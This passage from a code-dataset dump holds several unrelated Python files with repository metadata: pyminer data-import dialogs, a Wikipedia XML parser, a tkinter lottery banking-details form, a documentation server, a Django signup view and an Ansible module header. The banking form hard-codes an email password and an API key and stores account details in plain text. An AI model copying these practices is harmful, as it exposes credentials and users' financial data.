        self.verticalLayoutAddUI(self.lineEdit_limitRow, "left")  # row limit
        self.verticalLayoutAddUI(self.lineEdit_skipRow, "right")  # rows to skip
        self.publicUIFormActivity()
        self.AddUIFormActivity()

    def getImportParam(self):
        """
        Collect the import options from the UI into ``self.import_param``:
        header flag, dataset name, skip/limit row counts, file path, sheet.
        """
        self.updateWarningMessage(new=False)
        # Excel data is always fully loaded and post-processed in memory,
        # so ispreview is effectively always False here.
        self.import_param.update(
            datasetname=self.lineEdit_datasetName.text(),
            filepath=self.lineEdit_filePath.text(),
            hasheader=self.checkBox_ifColumns.isChecked(),
            status=False, varname={}, dtypes={}, loaddataset=False, ismerge=True,
            limitrows=self.checkRowsNumber(self.lineEdit_limitRow.text(), "limitRows"),
            skiprows=self.checkRowsNumber(self.lineEdit_skipRow.text(), "skipRows"),
            param={
                "io": self.checkFilePath(self.lineEdit_filePath.text()),
                # NOTE(review): "python" is not a valid pandas read_excel
                # engine; LoadSheetname() overwrites it with xlrd/openpyxl
                # before any read happens — confirm intended.
                "engine": "python",
                "sheet_name": "",
                "header": 'infer' if self.checkBox_ifColumns.isChecked() else None,
                "nrows": None,  # load everything; limiting is done in memory
                "index_col": 0 if self.checkBox_ifColIndex.isChecked() else None,
                "skiprows": 0
            }
        )
        if self.import_message["isError"]:
            return
        if self.new_import_filepath != self.import_param["filepath"]:
            # Reload from disk only when the file path changed; otherwise
            # the in-memory copy is reused to reflect option changes.
            self.import_param.update(loaddataset=True)
            self.LoadSheetname()

    def LoadSheetname(self):
        """Pre-load the workbook's sheet names and pick the pandas engine."""
        # NOTE(review): endswith("xls") is case-sensitive — an uppercase
        # ".XLS" file would be routed to openpyxl; confirm intended.
        ftype = os.path.split(self.import_param["filepath"])[1].endswith("xls")
        # Collect every sheet name of the workbook.
        if ftype:
            # .xls format
            wb = xlrd.open_workbook(self.import_param["filepath"])
            self.sheetsname = wb.sheet_names()
        else:
            # .xlsx format
            wb = openpyxl.load_workbook(self.import_param["filepath"], read_only=True)
            self.sheetsname = wb.sheetnames
        # Choose the matching import engine.
        self.import_param["param"].update(engine='xlrd' if ftype else 'openpyxl')
        # When the workbook has several sheets, also offer importing them all
        # via the "(全部导入)" ("import all") pseudo entry.
        # self.updateChooseTagName(self.comboBox_sheetname, tagname = self.sheetsname)
        self.comboBox_sheetname.clear()
        tagname = ["(全部导入)"] + self.sheetsname if len(self.sheetsname) > 1 else self.sheetsname
        for v in tagname:
            # Refresh the "data location" drop-down of the Excel import form.
            self.comboBox_sheetname.addItem(v)

    def importDatasetReload(self):
        """
        Reload the imported data: read every sheet from disk when the path
        changed, then (on final import) apply sheet selection, header and
        skip/limit post-processing in memory.
        """
        if self.import_param["loaddataset"]:
            param = self.import_param["param"]
            self.current_dataset = {}
            for sheet_i in self.sheetsname:
                # Always load fully; trimming is done later in memory.
                param.update(sheet_name=sheet_i)
                self.current_dataset[sheet_i] = pd.read_excel(**param)
                run_command("", "pd.read_excel(%s)" % kwargs_to_str(param))
        if not self.import_param["ispreview"]:
            sheet_ind = self.comboBox_sheetname.currentText()
            if sheet_ind != "(全部导入)":
                # A single sheet was picked: keep only that one.
                self.import_param.update(ismerge=False)
                self.current_dataset = {sheet_ind: self.current_dataset[sheet_ind]}
            for name_i, temp in self.current_dataset.items():
                if not self.import_param["hasheader"]:
                    temp = self.headerAsColumns(temp)
                self.current_dataset[name_i] = self.datasetUpdate(
                    data=temp, limitrow=self.import_param["limitrows"], skiprow=self.import_param["skiprows"]
                )
        self.new_import_filepath = self.import_param["filepath"]
        self.getDatasetInfo()
        self.import_param.update(status=True, loaddataset=False)

    def updateTableView(self):
        """
        Refresh the preview table: per-sheet summary when "(全部导入)"
        (import all) is selected, otherwise the trimmed sheet itself.
        """
        # Prepare the content to render.
        self.clearPreviewDataTableWidget()
        self.updateDatasetNameLine(tag=self.comboBox_sheetname.currentText())
        if not self.import_param["status"]:
            self.showDatasetPreview(data=pd.DataFrame([]))
            return
        # Is the first row a header?
        header = self.checkBox_ifColumns.isChecked()
        # Currently selected sheet.
        load_sheet = self.comboBox_sheetname.currentText()
        l = self.import_param["limitrows"]
        s = self.import_param["skiprows"]
        if load_sheet == "(全部导入)":
            temp = []
            for name_i, data_i in self.current_dataset.items():
                if not header:
                    data_i = self.headerAsColumns(data_i)
                data_i = self.datasetUpdate(data_i, limitrow=l, skiprow=s)
                row_i, col_i = data_i.shape
                temp.append([name_i, row_i, col_i, data_i.columns.tolist()])
            header = True  # avoid rendering issues for the summary matrix
            # Columns: sheet name / rows / columns / column names.
            preview_data = pd.DataFrame(temp, columns=["表名称", "行数", "列数", "列名称"])
        else:
            preview_data = self.datasetUpdate(self.current_dataset[load_sheet], limitrow=l, skiprow=s)
        self.showDatasetPreview(data=preview_data, header=header)
# TODO: further optimization planned for this dialog.
class ImportSpssForm(ImportDialog, dataImportFormEngine):
    """
    Dialog for importing datasets from SPSS (*.sav) files.
    """

    def __init__(self, parent=None):
        super().__init__(parent)
        self.file_types = "*.sav"
        self.IconPath = ":/resources/icons/spss.svg"
        self.setupUi(self)
        self.center()
        self.clearImportParam()
        self.updateUIForm()

    def AddUIFormActivity(self):
        """Wire up the widget signals specific to this dialog."""
        self.checkBox_ifColumns.stateChanged.connect(self.updateTableView)  # first row is header
        self.comboBox_encode.currentIndexChanged.connect(self.previewButton)  # encoding changed

    def updateUIForm(self):
        """Lay out the configuration widgets of the import form."""
        self.encode_type = ["gbk", "utf8", "gb2312", "ascii"]
        self.comboBox_encode = self.updateForm_ComboBox(self.comboBox_encode, self.encode_type)
        self.horizontalLayoutAddUI(self.checkBox_ifColumns)
        self.verticalLayoutAddUI(self.lineEdit_datasetName, "left")
        self.verticalLayoutAddUI(self.comboBox_encode, "right")
        self.verticalLayoutAddUI(self.lineEdit_limitRow, "left")
        self.verticalLayoutAddUI(self.lineEdit_skipRow, "right")
        self.publicUIFormActivity()
        self.AddUIFormActivity()

    def getImportParam(self):
        """
        Collect the import options from the UI into ``self.import_param``:
        header flag, dataset name, skip/limit row counts, encoding, path.
        """
        self.updateWarningMessage(new=False)
        self.import_param.update(
            datasetname=self.lineEdit_datasetName.text(),
            filepath=self.lineEdit_filePath.text(),
            hasheader=self.checkBox_ifColumns.isChecked(),
            status=False, varname={}, dtypes={},
            limitrows=self.checkRowsNumber(self.lineEdit_limitRow.text(), "limitRows"),
            skiprows=self.checkRowsNumber(self.lineEdit_skipRow.text(), "skipRows"),
            param={
                "filename_path": self.checkFilePath(self.lineEdit_filePath.text()),
                "encoding": self.comboBox_encode.currentText()
            }
        )

    def importDatasetReload(self):
        """
        Reload the imported data via ``pyreadstat.read_sav``.
        """
        import pyreadstat
        param = self.import_param["param"]
        self.current_dataset = {}
        varname = self.import_param["datasetname"]
        self.current_dataset[varname], meta = pyreadstat.read_sav(**param)
        # SPSS imports exactly one file at a time, so the dataset name
        # doubles as the variable name.
        self.getDatasetInfo()
        self.import_param.update(status=True)

    def updateTableView(self):
        """
        Refresh the preview table.
        """
        # Prepare the content to render.
        self.clearPreviewDataTableWidget()
        if not self.import_param["status"]:
            return
        name = self.import_param["datasetname"]
        self.showDatasetPreview(data=self.current_dataset[name], header=True)
# Optimization of this dialog is complete.
class ImportSasForm(ImportDialog, dataImportFormEngine):
    """Dialog for importing datasets from SAS (*.sas7bdat) files."""

    def __init__(self, parent=None):
        super().__init__(parent)
        self.file_types = "*.sas7bdat"
        self.IconPath = ":/resources/icons/sas.ico"
        self.setupUi(self)
        self.center()
        self.clearImportParam()
        self.updateUIForm()

    def AddUIFormActivity(self):
        """Wire up all widget signals of this dialog."""
        # Open the file chooser from the import window.
        self.pushButton_choosefile.clicked.connect(self.chooseFileButton)
        # Help.
        self.pushButton_help.clicked.connect(self.showHelp)
        # Option changes refresh the preview.
        self.checkBox_ifColumns.stateChanged.connect(self.updateTableView)  # first row is header
        self.comboBox_encode.currentIndexChanged.connect(self.previewButton)  # encoding changed
        # Action buttons.
        self.pushButton_preview.clicked.connect(self.previewButton)  # preview
        self.pushButton_ok.clicked.connect(self.importDatasetButton)  # import
        self.pushButton_cancel.clicked.connect(self.close)  # cancel

    def updateUIForm(self):
        """Lay out the configuration widgets of the import form."""
        # BUGFIX: self.encode_type was never assigned in this class, so the
        # updateForm_ComboBox call below raised AttributeError. Define the
        # same encoding list that ImportSpssForm uses.
        self.encode_type = ["gbk", "utf8", "gb2312", "ascii"]
        self.comboBox_encode = self.updateForm_ComboBox(self.comboBox_encode, self.encode_type)
        self.horizontalLayoutAddUI(self.checkBox_ifColumns)
        self.verticalLayoutAddUI(self.lineEdit_datasetName, "left")
        self.verticalLayoutAddUI(self.comboBox_encode, "right")
        self.verticalLayoutAddUI(self.lineEdit_limitRow, "left")
        self.verticalLayoutAddUI(self.lineEdit_skipRow, "right")
        self.AddUIFormActivity()

    def getImportParam(self):
        """
        Collect the import options from the UI into ``self.import_param``:
        header flag, dataset name, encoding and file path.
        """
        self.updateWarningMessage(new=False)
        self.import_param.update(
            datasetname=self.lineEdit_datasetName.text(),
            filepath=self.lineEdit_filePath.text(),
            hasheader=self.checkBox_ifColumns.isChecked(),
            status=False, varname={}, dtypes={},
            param={
                "filepath_or_buffer": self.checkFilePath(self.lineEdit_filePath.text()),
                "format": "sas7bdat",
                "encoding": self.comboBox_encode.currentText()
            }
        )

    def importDatasetReload(self):
        """
        Reload the imported data via ``pd.read_sas``.
        """
        param = self.import_param["param"]
        self.current_dataset = {}
        varname = self.import_param["datasetname"]
        self.current_dataset[varname] = pd.read_sas(**param)
        # SAS imports exactly one file at a time, so the dataset name
        # doubles as the variable name.
        self.getDatasetInfo()
        self.import_param.update(status=True)

    def updateTableView(self):
        """
        Refresh the preview table.
        """
        # Prepare the content to render.
        self.clearPreviewDataTableWidget()
        if not self.import_param["status"]:
            return
        name = self.import_param["datasetname"]
        self.showDatasetPreview(data=self.current_dataset[name], header=True)
# Optimization of this dialog is complete.
class ImportMatlabForm(ImportDialog, dataImportFormEngine):
    """Dialog for importing datasets from MATLAB (*.mat) files."""

    def __init__(self, parent=None):
        super().__init__(parent)
        # Path of the file loaded last time; used to skip re-reading it
        # when only display options changed.
        self.new_import_filepath = ""
        self.file_types = "*.mat"
        self.IconPath = ":/resources/icons/matlab.svg"
        self.setupUi(self)
        self.center()
        self.clearImportParam()
        self.updateUIForm()

    def AddUIFormActivity(self):
        """Wire up the widget signals specific to this dialog."""
        self.checkBox_asDataFrame.stateChanged.connect(self.updateTableView)  # import as DataFrame
        self.comboBox_varname.currentTextChanged.connect(self.updateTableView)

    def updateUIForm(self):
        """Lay out the configuration widgets of the import form."""
        self.horizontalLayoutAddUI(self.checkBox_asDataFrame)
        self.verticalLayoutAddUI(self.lineEdit_datasetName, "left")
        self.verticalLayoutAddUI(self.comboBox_varname, "right")
        self.publicUIFormActivity()
        self.AddUIFormActivity()

    def getImportParam(self):
        """
        Collect the import options from the UI into ``self.import_param``:
        dataset name, file path and the "as DataFrame" flag.
        """
        self.updateWarningMessage(new=False)
        self.import_param.update(
            datasetname=self.lineEdit_datasetName.text(),
            filepath=self.lineEdit_filePath.text(), loaddataset=False,
            status=False, varname={}, dtypes={}, ismerge=True,
            asdataframe=self.checkBox_asDataFrame.isChecked(),
            param={
                "file_name": self.checkFilePath(self.lineEdit_filePath.text())
            }
        )
        if self.import_message["isError"]:
            return
        if self.new_import_filepath != self.import_param["filepath"]:
            # Reload from disk only when the file path changed; otherwise
            # the in-memory copy is reused.
            self.import_param.update(loaddataset=True)

    def importDatasetReload(self):
        """
        Reload the imported data: read the .mat file from disk when the
        path changed, then (on final import) apply variable selection and
        the optional ndarray -> DataFrame conversion.
        """
        if self.import_param["loaddataset"]:
            import scipy.io as sio
            param = self.import_param["param"]
            self.current_dataset = {}
            mat_dataset = sio.loadmat(**param)
            self.new_import_filepath = self.import_param["filepath"]
            for name_i, var_i in mat_dataset.items():
                if type(var_i) == np.ndarray and name_i[:2] != "__":
                    # Keep only array-typed entries.
                    # Some non-matrix data is also stored as ndarray, so a
                    # strict type(...) == np.ndarray comparison is used to
                    # locate the genuine array variables.
                    # Note: scipy.io.loadmat cannot parse MATLAB "table"
                    # data; "__"-prefixed keys are loadmat metadata.
                    self.current_dataset[name_i] = var_i
            self.import_param.update(status=True, loaddataset=False)
            self.updateChooseTagName(self.comboBox_varname)
        if not self.import_param["ispreview"]:
            for name_i, var_i in self.current_dataset.items():
                # Optionally wrap <=2-D arrays as DataFrames on final import.
                self.current_dataset[name_i] = pd.DataFrame(var_i) if self.import_param["asdataframe"] and len(
                    var_i.shape) <= 2 else var_i
            varname = self.comboBox_varname.currentText()
            if varname != "(全部导入)":
                # "(全部导入)" = import all; otherwise keep the chosen variable.
                self.import_param.update(ismerge=False)
                self.current_dataset = {varname: self.current_dataset[varname]}
        self.getDatasetInfo()  # refresh info about the current dataset

    def updateTableView(self):
        """
        Refresh the preview table: per-variable summary when "(全部导入)"
        (import all) is selected, otherwise the variable's head.
        """
        # Prepare the content to render.
        varname = self.comboBox_varname.currentText()
        self.clearPreviewDataTableWidget()
        self.updateDatasetNameLine(tag=varname)
        if not self.import_param["status"]:
            self.showDatasetPreview(data=pd.DataFrame([]))
            return
        if varname == "(全部导入)":
            temp = []
            for name_i, data_i in self.current_dataset.items():
                temp.append([name_i, data_i.shape, type(data_i)])
            # Columns: variable name / shape / data type.
            preview_data = pd.DataFrame(temp, columns=["表名称", "大小", "数据格式"])
        elif not varname:
            # Combo box is empty (being repopulated): nothing to show.
            return
        else:
            temp = self.current_dataset[varname]
            if len(self.current_dataset[varname].shape) > 2:
                # >2-D arrays cannot be tabulated; show a metadata row.
                temp = pd.DataFrame([{
                    "变量": varname, "数据类型": type(temp), "数据格式": temp.dtype,
                    "大小": self.current_dataset[varname].shape
                }])
            else:
                temp = pd.DataFrame(self.current_dataset[varname][0:100])
                temp.columns = ["C" + str(i + 1) for i in range(temp.shape[1])]
            preview_data = temp
        self.showDatasetPreview(data=preview_data, header=True)
# Optimization of this dialog is complete.
class ImportStataForm(ImportDialog, dataImportFormEngine):
    """Dialog for importing datasets from Stata (*.dta) files."""

    def __init__(self, parent=None):
        super().__init__(parent)
        self.file_types = "*.dta"
        self.IconPath = ":/resources/icons/stata.svg"
        self.setupUi(self)
        self.center()
        self.clearImportParam()
        self.updateUIForm()

    def AddUIFormActivity(self):
        """Wire up the widget signals specific to this dialog."""
        self.checkBox_ifColIndex.stateChanged.connect(self.updateTableView)  # first column is index

    def updateUIForm(self):
        """Lay out the configuration widgets of the import form."""
        self.horizontalLayoutAddUI(self.checkBox_ifColIndex)
        self.verticalLayoutAddUI(self.lineEdit_datasetName, "left")
        self.publicUIFormActivity()
        self.AddUIFormActivity()

    def getImportParam(self):
        """
        Collect the import options from the UI into ``self.import_param``:
        dataset name, file path and the index-column flag.
        """
        self.updateWarningMessage(new=False)
        self.import_param.update(
            datasetname=self.lineEdit_datasetName.text(),
            filepath=self.lineEdit_filePath.text(),
            hasheader=True,
            status=False, varname={}, dtypes={},
            param={
                "filepath_or_buffer": self.checkFilePath(self.lineEdit_filePath.text()),
                "index_col": 0 if self.checkBox_ifColIndex.isChecked() else None
            }
        )

    def importDatasetReload(self):
        """
        Reload the imported data via ``pd.read_stata``.
        """
        param = self.import_param["param"]
        self.current_dataset = {}
        varname = self.import_param["datasetname"]
        self.current_dataset[varname] = pd.read_stata(**param)
        # Stata imports exactly one file at a time, so the dataset name
        # doubles as the variable name.
        self.getDatasetInfo()
        self.import_param.update(status=True)

    def updateTableView(self):
        """
        Refresh the preview table.
        """
        # Prepare the content to render.
        self.clearPreviewDataTableWidget()
        if not self.import_param["status"]:
            return
        name = self.import_param["datasetname"]
        self.showDatasetPreview(data=self.current_dataset[name], header=True)
| pyminer/pyminer | pyminer/packages/dataio/sample.py | sample.py | py | 47,148 | python | zh | code | 77 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "pandas.DataFrame",
"line_number": 31,
"usage_type": "attribute"
},
{
"api_name": "os.path.ex... |
31897243562 | from bs4 import BeautifulSoup
from collections import defaultdict, Counter
class Parser:
    """Helpers for parsing word lists and Wikipedia XML dumps."""

    @staticmethod
    def getWordsArticle(file):
        """Parse lines of the form ``#word => count`` into (word, count) tuples."""
        words = []
        with open(file, encoding='utf-8') as f:
            for line in f:
                line = line.split(" => ")
                word = line[0].replace("#", "")
                count = int(line[1].replace("\n", ""))
                words.append((word, count))
        return words

    @staticmethod
    def getAllPages(file):
        """Return every <page> element of an XML dump."""
        # BUGFIX: the file handle was opened and never closed; a context
        # manager releases it deterministically.
        with open(file) as handle:
            content = handle.read()
        soup = BeautifulSoup(content, 'xml')
        return soup.find_all('page')

    @staticmethod
    def getText(page):
        """Return the <title> element of a page fragment (or None if absent)."""
        soup = BeautifulSoup(page, 'html.parser')
        return soup.title

    @staticmethod
    def getRefs(text):
        """Return all <ref> elements found in *text*."""
        soup = BeautifulSoup(text, 'html.parser')
        return soup.find_all('ref')

    @staticmethod
    def solveMatches(matches):
        """
        Pick the winning category from (category, distance) pairs.

        The most frequent category wins outright; frequency ties are broken
        by summed distance (shortest wins; a tie there resolves to the last
        candidate in frequency order).
        """
        count = Counter([x[0] for x in matches]).most_common()
        # BUGFIX: with a single distinct category, count[1] raised
        # IndexError; a lone category trivially wins.
        if len(count) == 1 or count[0][1] != count[1][1]:
            return count[0][0]
        # Only categories tied with the most common one stay in the running.
        max_cats = [match[0] for match in count if match[1] == count[0][1]]
        # Sum the distances of each surviving category and take the shortest;
        # if the sums also tie, take the last one.
        distance_dict = defaultdict(int)
        for k, v in matches:
            if k in max_cats:
                distance_dict[k] += v
        return Counter(distance_dict).most_common()[-1][0]
| cenh/Wikipedia-Heavy-Hitters | Parser.py | Parser.py | py | 1,600 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "bs4.BeautifulSoup",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "collections.Cou... |
36376749917 | # Devin Fledermaus Class 1
import tkinter
from tkinter import *
from tkinter import messagebox
from playsound import playsound
import requests
from datetime import datetime
import re
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
# Creating the fixed-size main window.
root = Tk()
root.geometry("700x800")
root.resizable(False, False)
root.title("Banking Details")
root.config(bg="blue")
# Timestamp captured at startup; reused for every audit line written to
# user_details.txt.
now = datetime.now()
class BankDetails:
    """
    Banking-details form: collects account data, converts ZAR amounts to
    other currencies via exchangerate-api.com, and e-mails a confirmation.
    """

    def __init__(self, window):
        # Labels
        self.lbl1 = Label(window, text="Banking Details", font=("Arial", 30))
        self.lbl1.place(x=200, y=30)
        self.lbl2 = Label(window, text="Account Holder Name", font=("Arial", 15))
        self.lbl2.place(x=50, y=100)
        self.lbl3 = Label(window, text="Account number", font=("Arial", 15))
        self.lbl3.place(x=50, y=150)
        self.lbl4 = Label(window, text="Bank", font=("Arial", 15))
        self.lbl4.place(x=50, y=200)
        # Entries (ent3 = amount to convert, ent4 = read-only result)
        self.ent1 = Entry(root, width=30)
        self.ent1.place(x=300, y=100)
        self.ent2 = Entry(root, width=30)
        self.ent2.place(x=300, y=150)
        self.ent3 = Entry(root, width=20)
        self.ent3.place(x=150, y=500)
        self.ent4 = Entry(root, width=20, state="readonly")
        self.ent4.place(x=150, y=650)
        # OptionMenu with the supported banks
        self.default_txt = "Select Bank"
        self.default_var = tkinter.StringVar(value=self.default_txt)
        self.optmenu = OptionMenu(root, self.default_var, "Absa Bank", "Capitec Bank", "Standard Bank", "First National Bank")
        self.optmenu.place(x=300, y=200)
        # Buttons
        self.btn = Button(root, text="Submit", width=5, bg="green", command=self.check, borderwidth=5)
        self.btn.place(x=300, y=320)
        self.clrbtn = Button(root, text="Clear", width=5, bg="green", command=self.clear, borderwidth=5)
        self.clrbtn.place(x=150, y=320)
        self.extbtn = Button(root, text="Exit", width=5, bg="green", command=self.exit_btn, borderwidth=5)
        self.extbtn.place(x=450, y=320)
        self.conbtn = Button(root, text="Convert", width=16, bg="green", command=self.convert, borderwidth=5)
        self.conbtn.place(x=150, y=570)
        # Fetch the ZAR conversion table from the external exchange-rate API.
        # NOTE(review): the API key is embedded in the URL — consider moving
        # it to configuration.
        self.conversion_rate = {}
        try:
            self.information = requests.get('https://v6.exchangerate-api.com/v6/910ab09f145c5695a5228187/latest/ZAR')
            information_json = self.information.json()
            self.conversion_rate = information_json['conversion_rates']
        except requests.exceptions.ConnectionError:
            messagebox.showerror("Error", "No internet connection. Please try again later.")
        # Listbox of target currencies (empty if the request above failed).
        self.convert_list = Listbox(root, width=15, bg="white")
        for i in self.conversion_rate.keys():
            self.convert_list.insert(END, str(i))
        self.convert_list.place(x=370, y=500)

    # Button callbacks.
    # Currency-conversion button.
    def convert(self):
        """Convert the ZAR amount in ent3 to the currency selected in the list."""
        try:
            # Rates are re-fetched on every click so the result is current.
            information = requests.get('https://v6.exchangerate-api.com/v6/910ab09f145c5695a5228187/latest/ZAR')
            information_json = information.json()
            conversion_rate = information_json['conversion_rates']
            num = float(self.ent3.get())
            ans = num * information_json['conversion_rates'][self.convert_list.get(ACTIVE)]
            # Temporarily make the result entry writable to update it.
            self.ent4['state'] = 'normal'
            self.ent4.delete(0, END)
            self.ent4.insert(0, ans)
            self.ent4['state'] = 'readonly'
        except (ValueError, requests.exceptions.ConnectionError):
            self.ent3.delete(0, END)
            # NOTE(review): ent4 is read-only here, so this delete is a
            # no-op — confirm intended.
            self.ent4.delete(0, END)
            messagebox.showerror("Error", "Please enter digits")

    # Sending the confirmation e-mail.
    def verify(self):
        """Append the entered details to the audit file and e-mail the winner."""
        # Audit-log the submission.
        w = open("user_details.txt", "a+")
        w.write("Account Holder Name: " + self.ent1.get() + "\n")
        w.write("Account Number: " + self.ent2.get() + "\n")
        w.write("Bank: " + self.default_var.get() + "\n")
        w.write("Logged in at " + str(now) + " " + "&" + "\n")
        w.write("\n")
        w.close()
        # Recover the most recent e-mail address from the audit file.
        # NOTE(review): nothing in this class writes an address — this
        # assumes an earlier screen appended one; emails[-1] raises
        # IndexError otherwise. Verify against the rest of the app.
        file_to_read = "user_details.txt"
        file = open(file_to_read, "r")
        list_file = file.readlines()
        email_list = str(list_file)
        emails = re.findall(r"[a-z0-9\.\-+_]+@[a-z0-9\.\-+_]+\.[a-z]+", email_list)
        email = emails[-1]
        # NOTE(review): hard-coded SMTP credentials in source — move to
        # environment/config and rotate the password.
        sender_email_id = 'lottodevin@gmail.com'
        receiver_email_id = email
        password = "Pythonlotto"
        subject = "Congratulations"
        msg = MIMEMultipart()
        msg['From'] = sender_email_id
        msg['To'] = receiver_email_id
        msg['Subject'] = subject
        body = "You have won the lottery.\n"
        body = body + "You will be contacted for further details"
        msg.attach(MIMEText(body, 'plain'))
        text = msg.as_string()
        s = smtplib.SMTP('smtp.gmail.com', 587)
        # start TLS for security
        s.starttls()
        # Authentication
        s.login(sender_email_id, password)
        print(receiver_email_id)
        # message to be sent
        # sending the mail
        s.sendmail(sender_email_id, receiver_email_id, text)
        # terminating the session
        s.quit()

    # Submit button.
    def check(self):
        """Validate the form; on success send the e-mail and offer to exit."""
        sel = self.ent1.get()
        sel2 = self.ent2.get()
        # Audit-log the claim (written even when validation fails below).
        w = open("user_details.txt", "a+")
        w.write("Account Holder Name: " + str(sel) + "\n")
        w.write("Account Number: " + str(sel2) + "\n")
        w.write("Bank: " + self.default_var.get() + " " + "&" + "\n")
        w.write("Winnings Claimed at: " + str(now) + "\n")
        w.close()
        # Account-holder validation.
        # NOTE(review): isalpha() rejects names containing spaces — confirm
        # intended.
        if not sel.isalpha():
            messagebox.showerror('Account Holder Name', 'Please make sure account holder name is entered correctly')
        # Account-number validation.
        elif not sel2.isdigit():
            messagebox.showerror('Account Number', 'Please make sure account number is entered correctly')
        # No bank selected.
        elif self.default_var.get() == "Select Bank":
            messagebox.showerror('Bank', 'Please select a bank')
        else:
            self.verify()
            self.exit_btn()

    # Clear button: reset every field to its initial state.
    def clear(self):
        playsound("clear.mp3")
        self.ent1.delete(0, END)
        self.ent2.delete(0, END)
        self.default_var.set(self.default_txt)
        self.ent3.delete(0, END)
        self.ent4['state'] = "normal"
        self.ent4.delete(0, END)
        self.ent4['state'] = "readonly"

    # Exit button with a confirmation dialog.
    def exit_btn(self):
        playsound("exit.mp3")
        msg = messagebox.askquestion("Termination", "Are you sure you want to close the program?")
        if msg == "yes":
            root.destroy()
# Instantiate the form and enter the Tk event loop.
obj_BankDetails = BankDetails(root)
# Run Program
root.mainloop()
| DevinFledermaus/Lotto_EOMP | main3.py | main3.py | py | 7,008 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.datetime.now",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "tkinter.StringVar",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "requests.ge... |
17884032715 | import logging
import os
import types
from typing import Optional
import core.algorithms as algorithms
from features.extensions.extensionlib import BaseExtension, BaseInterface
from packages.document_server.docserver import Server
logger = logging.getLogger(__name__)
class Extension(BaseExtension):
    # Single HTTP server for the whole extension, rooted at the directory of
    # the `core.algorithms` package so its markdown docs can be served.
    server = Server(os.path.dirname(algorithms.__file__))

    def on_load(self):
        """Start the documentation HTTP server when the extension loads."""
        # Log line (Chinese): "help document server: http://127.0.0.1:<port>"
        logger.info(f'帮助文档服务器:http://127.0.0.1:{self.server.port}')
        self.server.run()
class Interface(BaseInterface):
    """Public API of the document-server extension: open help pages and web
    searches in the application's embedded browser."""

    def __init__(self):
        # Id of the browser tab used last time. Reusing it guarantees that
        # subsequent help lookups land in the same built-in browser, which
        # saves memory and keeps the interaction in one place.
        self.browser_id: Optional[int] = None

    def _show_url(self, url: str) -> None:
        """Open *url* in the embedded browser (docked right), reusing the
        previously opened tab when there is one."""
        embedded_browser = self.extension.extension_lib.get_interface('embedded_browser')
        if self.browser_id is None:
            self.browser_id = embedded_browser.open_url(url=url, side='right')
        else:
            self.browser_id = embedded_browser.open_url(
                url=url, browser_id=self.browser_id, side='right')

    def open_by_function_name(self, name: str):
        """
        Open the documentation of an `algorithms` function by its name.

        :param name: name of a function inside the `algorithms` package;
            silently ignored when no such attribute exists
        """
        attr_list = dir(algorithms)
        if name in attr_list:
            func = getattr(algorithms, name)
            self.open_by_function_object(func)

    def open_external_search_result(self, word_to_search: str):
        """
        Open a Bing search for *word_to_search* in the embedded browser.

        :param word_to_search: raw (unencoded) search term
        """
        from urllib.parse import quote
        # BUGFIX: percent-encode the query so spaces and non-ASCII
        # characters form a valid URL.
        path = 'https://cn.bing.com/search?q=%s' % quote(word_to_search)
        self._show_url(path)

    def open_by_function_object(self, function: types.FunctionType):
        """
        Open the markdown help page of *function* in the embedded browser.

        The module path is mapped onto a file served by this extension's
        HTTP server, e.g.::

            array.__module__                  -> 'algorithms.linear_algebra.array'
            strip the top-level package       -> 'linear_algebra.array'
            dots to slashes, add extension    -> 'linear_algebra/array.md'
        """
        path = function.__module__.split('.', maxsplit=1)[1]
        path = path.replace('.', '/')
        path = f'{path}.md'
        # Defensive: drop a stray leading separator if one ever appears.
        if path.startswith('/'):
            path = path[1:]
        if path.startswith('\\'):
            path = path[1:]
        port = Extension.server.port
        self._show_url(f'http://127.0.0.1:{port}/{path}')
| pyminer/pyminer | pyminer/packages/document_server/main.py | main.py | py | 3,241 | python | en | code | 77 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "features.extensions.extensionlib.BaseExtension",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "packages.document_server.docserver.Server",
"line_number": 14,
"usage_ty... |
39553483739 | from rest_framework import viewsets
from rest_framework.response import Response
from rest_framework.exceptions import ParseError
from rest_framework.decorators import action, api_view
from core import models, serializers, utils
from rest_framework_simplejwt.tokens import RefreshToken
@api_view(['POST'])
def signup(req):
    """Register a new user and return a JWT refresh/access token pair."""
    payload = {
        'email': req.data.get('email'),
        'password': req.data.get('password'),
    }
    serializer = serializers.UserSerializer(data=payload)
    if not serializer.is_valid():
        raise ParseError(serializer.errors)
    serializer.save()
    new_user = models.User.objects.get(id=serializer.data['id'])
    token = RefreshToken.for_user(new_user)
    return Response({
        'refresh': str(token),
        'access': str(token.access_token),
    })
| mahziyar-es/movie-review | server/api/views/auth.py | auth.py | py | 824 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "core.serializers.UserSerializer",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "core.serializers",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "rest_framework.exceptions.ParseError",
"line_number": 20,
"usage_type": "call"
},
{
... |
74059453544 | from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils import dellemc_ansible_utils as utils
import logging
from datetime import datetime, timedelta
from uuid import UUID
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = r'''
---
module: dellemc_powerstore_snapshot
version_added: '2.6'
short_description: Manage Snapshots on Dell EMC PowerStore.
description:
- Managing Snapshots on PowerStore.
- Create a new Volume Group Snapshot,
- Get details of Volume Group Snapshot,
- Modify Volume Group Snapshot,
- Delete an existing Volume Group Snapshot,
- Create a new Volume Snapshot,
- Get details of Volume Snapshot,
- Modify Volume Snapshot,
- Delete an existing Volume Snapshot.
author:
- Rajshree Khare (Rajshree.Khare@dell.com)
